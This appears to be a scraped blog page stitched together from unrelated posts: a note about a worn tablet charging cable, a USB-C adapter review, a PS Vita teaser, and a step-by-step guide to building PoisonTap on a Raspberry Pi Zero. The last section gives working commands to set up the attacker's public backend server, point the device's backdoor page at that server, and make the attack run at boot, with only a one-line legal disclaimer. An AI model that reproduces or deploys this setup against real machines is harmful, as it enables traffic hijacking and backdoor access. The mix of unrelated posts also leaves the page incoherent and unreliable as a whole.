They gave me the wrong Head at the Head Place
Ummm....hey guys? I think it’s time that I’ll be showing my last January 2021 Tumblr post into a shock. Today while I was just charging my Samsung Galaxy Tab E like it’s normal, suddenly I took a notice to checking for the charging usb cable part. I was in it for surprise that it gotten a rip from the USB Micro B; after years that it sometimes started to get old and would be unusable for a while.
🐰🖌Maxwell: Well I do remember back in December 25th, 2018 when you’ve unboxing your Samsung Galaxy Tab E for Christmas. (Link Here) So for my math is correct that it’s been 3 years since you’ve been using your original usb cable to charge your table from time to time. Bet you gonna have a new one, huh?
That’s right, Maxwell. Though should I go for the same original or a complete newer version, but hoping if it can work to recognized my Samsung Galaxy Tab E to make sure it can charge without knowing the different. For now though, I already turn off my Samsung Galaxy Tab E for safe keeper til I’ll be getting a new usb cable sooner or later. Don’t worry about it as my Samsung Galaxy Tab E is already 100% full battery.
Accessories for my XP-Pen Deco 01 V2 (w/ my Paper Dolls) - Part 1 [Jun 25, 2020]
I’m almost ready to test out my XP-Pen Deco 01 V2 graphics tablet! But before that, I have few accessories (or rather accessory) that I want to show ya. 🙂
NOTE: Some of my images I took using my Samsung Galaxy S4 (GT-i9505) are combined into one image via GIMP software, despite I have a total of 28 images (Part 2 included).
So let’s get started:
1st & 2nd Image(s): • Here are my two items I needed; a blue laptop sleeve pouch, and a USB adapter. My paper dolls wants to laid down and relax with my purchased laptop sleeve, okay then you can relax for now but I gonna need for review.☺️
3rd Image: •Now first off, a Micro USB to USB Type C Adapter from !ACCEZZ brand. I purchased this item for ₱107 discount (now it’s ₱114) from their Lazada’s store [CLICK ME!],and yes it’s two 2 pieces for a fair price.
4th to 6th Image(s) [combined]: • Here are the actual items itself right out of the plastic pouch. • [5th & 6th Images]: On the left you see the USB Type C socket, while on the right was the Micro USB Cable.
7th & 8th Image(s) [combined]: • [7th & 8th Images combined]:I bring my two USB type C formats from my XP-Pen Deco 01 V2′s accessories for a test out fit to my two USB adapters. My paper dolls say that it matched perfectly, yup it is. 🙂 • [9th & 10th Images combined]: And indeed, it fits correctly. I can finally connected using my adapters for my future USB type C needs.🙂
11th to 14th Image(s) [combined]: • [11th & 12th Images combined]: Connecting my Honor 8C to my two adapters was perfect, albeit with a little Frankenstein look but that’s alright. My paper dolls gives a thumbs up.👍
• Unfortunately, when I tested using my flash drive on my Frankenstein adapter it did not work. Which means connecting my adapter to my Type C OTG adapter was utterly useless, bummer (both me and my paper dolls)... 😟
I’d just hope It’ll work using my graphics tablet with my Frankenstein adapter, which coming up very soon.
• [13th & 14th Images combined]: Connecting with my USB type C cable on the other hand was also perfect, but unlike OTG adapter, the USB cable was functional well. So yeah like I said, I could used this for my USB Type C cables in the future. The Type C format was all the range from different tech brands and soon the Micro USB format will be phased out (I hope but not really). My paper dolls gives also a thumbs up.👍
Overall: • I think these two USB adapters are okay; after all my Micro USB adapters are designed for USB Type C data/charging cables and not USB type C OTG adapters, unless if I’m using either OTG flash drive or a card reader with a Type C format will work somehow. Although I don’t have any those so maybe I’ll buy either two in my future plans. Bottom-line my Micro USB adapters are okay so thumbs up for me as well.👍
Well that’s all for now and please look forward to my ‘Part 2′ for my blue laptop sleeve. Please scroll upward.↑ Or if you can’t find that part then please [CLICK ME!].
And in case you missed my previous topics, then I’ve already provide links in the ‘previous’ down below. ↓😉

Top Tips To Futureproof Your PS Vita
Top Tips To Futureproof Your PS Vita
With the PlayStation Vita being discontinued globally, we are now at a crossroads with the console. No new hardware is being produced. Support from retailers is dwindling. Accessories and essential supplies are becoming harder to find brand new so we are being forced to look to the second hand market for them. Physical game production has come to an end in the West and it’s only a matter of time…

Installing Poison Tap for dummies (The most complete guide on the internet)
Samy Kamkars Poison tap is probably one of the most exciting raspberry pi0 infosec focused projects out there at the moment. not only is poison tap a really powerful tool but its also relatively cheap to build (this whole project only cost me about $40).
As always disclaimer trying to run Poison tap on infrastructure that is not your own or that you don't have permission to access is most likely illegal, don't try this at home kids.
Lets launch into Poison tap!
What you will need
So for this project you will need the following items to build a working poisontap setup:
A Raspberry pi zero.
A publicly accessible web server.
An SD card (to install raspbian on - it should be at least 16GB).
A micro usb cable.
Building the image
Run the following linux / unix commands to install raspbian on your sd card
Last login: Sun Feb 19 15:16:09 on ttys001 MBP:~ secsleuth$ ls 2017-03-02-raspbian-jessie.img MBP:~ secsleuth$ sudo dd bs=1m if=2017-03-02-raspbian-jessie.img of=/dev/disk2 4190+0 records in 4190+0 records out 4393533440 bytes transferred in 1346.772204 secs (3262269 bytes/sec) MBP:~ secsleuth$
After creating the image we need to make a file called "ssh" and copy it to the root of the SD card so that the pi0 will be accessible over ssh.
Installing the Poison tap tools on your server
When running poisontap you will need a server for your pi0 to pipe data to, you can get your server up and running by running the following commands:
$ sudo apt-get install git npm $ sudo npm install websocket $ curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash - $ sudo apt-get install nodejs $ git clone https://github.com/samyk/poisontap $ cd poisontap $ sudo node backend_server.js & Sat Apr 01 2017 08:30:47 GMT+0000 (UTC) Server is listening on port 1337
Now your server is ready and listening for your poisontap. Please note that your server must be publicly accessible so for this server I am using an AWS hosted instance.
Configuring your poison tap
Like we just did for the webserver we must now ssh into our raspberry pi0 and complete the poisontap setup with the following commands:
$ sudo apt-get -y install isc-dhcp-server dsniff git $ curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash - $ sudo apt-get install nodejs $ git clone https://github.com/samyk/poisontap $ cd poisontap
now update the backdoor.html file to point to the webserver we setup earlier:
var socket = new WebSocket('ws://<amazon EC2 instance address>:1337');
Next we need to add the following to the bottom of the /etc/network/interfaces file
auto usb0 allow-hotplug usb0 iface usb0 inet static address 1.0.0.1 netmask 0.0.0.0
Now we need to update the pi0's DHCP config to work with poisontap so run the following command:
$ sudo cp -f dhcpd.conf /etc/dhcp/dhcpd.conf
We also need to add the following entry to the bottom of the /etc/default/isc-dhcp-server file:
INTERFACES="usb0"
Now we just need to make sure that poisontap runs on startup so to do this we need to run the following commands:
$ sudo cp /home/pi/poisontap/pi_startup.sh /etc/init.d/ $ sudo chmod +x /etc/init.d/pi_startup.sh
And we need to add the below to /etc/rc.local file just before it says exit 0
/etc/init.d/pi_startup.sh &
And thats it now your poisontap device is ready!
Conclusions
Now you are ready to go with your poisontap device! here is a look at my finished setup:
As always I hope you found this tutorial useful. Please let me know if you would like to see more tutorials on the raspberry pi0 or similar devices and thank you all for your support!
Also special thanks to Jerry Gamblin for his handy installation steps on GitHub.
